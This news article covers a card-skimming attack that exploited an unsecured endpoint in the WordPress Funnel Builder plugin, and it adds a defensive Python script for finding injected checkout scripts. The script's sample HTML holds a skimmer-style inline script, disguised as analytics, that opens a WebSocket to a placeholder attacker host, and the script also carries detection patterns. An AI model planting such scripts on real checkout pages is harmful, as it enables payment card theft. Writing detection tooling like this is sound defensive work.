WordPress Funnel Builder Bug Exposes 40K Sites to Card Theft
Critical flaw in Funnel Builder plugin lets attackers inject malicious scripts, affecting thousands of WooCommerce sites.

A critical vulnerability in the popular Funnel Builder plugin for WordPress has put over 40,000 websites at risk, enabling attackers to steal sensitive credit card information. This flaw, affecting all versions of the plugin prior to 3.15.0.3, has been actively exploited by malicious actors who inject harmful JavaScript into WooCommerce checkout pages.
The Vulnerability
Security firm Sansec uncovered the issue, revealing that the vulnerability allows attackers to modify the plugin's global settings through an unsecured, publicly accessible endpoint. This enables the insertion of arbitrary JavaScript into the plugin's 'External Scripts' setting, which the plugin then loads on checkout pages, so the malicious code executes in every shopper's browser.
The malicious code masquerades as a legitimate Google Tag Manager or Google Analytics script, which then opens a WebSocket connection to a rogue server. This server distributes a customized payment card skimmer, stealing critical data such as credit card numbers, CVVs, billing addresses, and other customer information.
FunnelKit's Response
FunnelKit, the developer behind the Funnel Builder plugin, responded quickly by releasing version 3.15.0.3 to close this security gap. The company has confirmed the malicious activity and urges users to update the plugin immediately through the WordPress dashboard. Because updating removes the vulnerability but not scripts an attacker has already stored, administrators are also advised to scrutinize the plugin's settings for any unauthorized scripts.
This incident highlights the necessity for regular updates and vigilant monitoring of site plugins, especially those handling financial transactions.
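The two remediation steps above (confirm the plugin is at 3.15.0.3 or later, then check checkout pages and the 'External Scripts' setting for scripts nobody added on purpose) can be partly automated. The script below is an added example written for this article; it is not code from FunnelKit, Sansec or the plugin. It assumes an administrator-maintained allowlist of script hosts and uses a constructed sample checkout page; the hostnames in that sample are placeholders.

```python
"""Defender-side checks for the Funnel Builder incident described above.

1. needs_update(): flags plugin versions below the fixed release 3.15.0.3.
2. find_suspicious_scripts(): parses checkout-page HTML (or the raw value of
   the plugin's 'External Scripts' setting) and reports script tags that load
   from hosts outside an allowlist, or inline scripts that open a WebSocket,
   the behaviour the article attributes to the skimmer.

Added example, not the plugin's own code; allowlist and sample HTML are
constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

FIXED_VERSION = "3.15.0.3"  # first patched release, per the article

# Constructed allowlist: hosts this site knowingly loads checkout scripts from.
ALLOWED_SCRIPT_HOSTS = {
    "www.googletagmanager.com",
    "www.google-analytics.com",
}

# Inline-script indicator: a WebSocket being opened from the checkout page.
SUSPICIOUS_INLINE = re.compile(r"new\s+WebSocket\s*\(|\bwss?://", re.IGNORECASE)


def _version_tuple(version):
    """'3.15.0.2' -> (3, 15, 0, 2); non-numeric parts are treated as 0."""
    parts = []
    for piece in version.strip().split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group()) if digits else 0)
    return tuple(parts)


def needs_update(installed_version):
    """True when the installed version is older than the fixed release."""
    return _version_tuple(installed_version) < _version_tuple(FIXED_VERSION)


class _ScriptCollector(HTMLParser):
    """Collects every <script> tag's src attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data  # html.parser feeds script text as data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (reason, detail) pairs for script tags that warrant review."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for script in collector.scripts:
        src, body = script["src"], script["body"]
        if src:
            host = urlparse(src).hostname  # handles https:// and //host/ forms
            if host and host not in allowed_hosts:
                findings.append(("external-src-not-allowlisted", src))
        if SUSPICIOUS_INLINE.search(body):
            findings.append(("inline-websocket", " ".join(body.split())[:80]))
    return findings


# Constructed sample: a legitimate GTM tag, an injected inline script posing
# as Google Analytics, and an injected external script. '.invalid' is a
# reserved TLD used here as a placeholder.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE"></script>
<script>
  // Google Analytics
  var ws = new WebSocket("wss://skimmer.invalid/collect");
</script>
<script src="https://cdn.skimmer.invalid/ga.js"></script>
</head><body>checkout form here</body></html>
"""

if __name__ == "__main__":
    print("needs update:", needs_update("3.15.0.2"))
    for reason, detail in find_suspicious_scripts(SAMPLE_CHECKOUT_HTML):
        print(reason, "->", detail)
```

In practice, feed find_suspicious_scripts() the HTML of your own checkout page fetched as a logged-out visitor, and separately the stored value of the 'External Scripts' setting, since the injected code lives there even when caching hides it from a page fetch. Treat any allowlist miss as something to explain, not something to ignore: the skimmer the article describes deliberately imitates Google Tag Manager and Analytics, so a familiar-looking name is not evidence of legitimacy.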
Context
The European e-commerce market is particularly vulnerable to such threats given its reliance on WordPress plugins like Funnel Builder to enhance conversion rates. This incident echoes past vulnerabilities in e-commerce platforms that have led to significant financial losses and data breaches. With GDPR in place, European businesses face additional pressure to maintain stringent data protection standards.
What this means for you
If you're a website owner or administrator using the Funnel Builder plugin, it's imperative to update to the latest version immediately. This update not only patches the vulnerability but also helps prevent potential financial and reputational damage. Be sure to review your site settings for any suspicious scripts to mitigate further risks.
What's still unclear
While FunnelKit has patched the vulnerability, questions remain about the extent of the data breach and how many users have been affected. Additionally, it’s uncertain how many websites have yet to implement the necessary updates to protect themselves.
Why this matters
Security flaws in widely-used plugins like Funnel Builder pose significant risks to online businesses and their customers. This vulnerability underlines the importance of regular software updates and vigilant security practices to safeguard sensitive data. As the digital landscape evolves, so too must our efforts to protect it from emerging threats.